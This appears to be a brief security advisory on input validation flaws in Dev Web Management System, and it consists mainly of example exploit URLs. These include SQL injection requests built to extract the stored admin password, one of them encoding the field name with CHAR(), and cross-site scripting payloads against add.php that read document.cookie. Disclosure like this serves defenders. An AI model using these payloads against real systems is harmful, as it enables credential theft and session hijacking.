|
Dev Web Management System Multiple Input Validation Vulnerabilities
An exploit is not required. The following examples were provided: http://example.com/[path]/index.php?session=0&action=openforum&cat=-1%20UNION%20SELECT%20value,value,value%20FROM%20variables1%20WHERE%20name=CHAR(97,100,10 9,105,110,95,112,97,115,115,119,111,114,100) http://example.com/[path]/getfile.php?cat=%%'UNION%20SELECT%20value,value%20FROM%20variables1%20%20WHERE%20name='admin_password'/* http://example.com/[path]/download_now.php?target=9999999999999[SQL] http://example.com/[path]/add.php?language[ENTER_ARTICLE_TITLE]=");}}--></script><script>alert(document.cookie)</script> http://example.com/[path]/add.php?language[SPECIFY_ZONE]=");}}--></script><script>alert(document.cookie)</script> http://example.com/[path]/add.php?language[ENTER_ARTICLE_HEADER]=");}}--></script><script>alert(document.cookie)</script> http://example.com/[path]/add.php?language[ENTER_ARTICLE_BODY]=");}}--></script><script>alert(document.cookie)</script> |
|
 Privacy Statement |
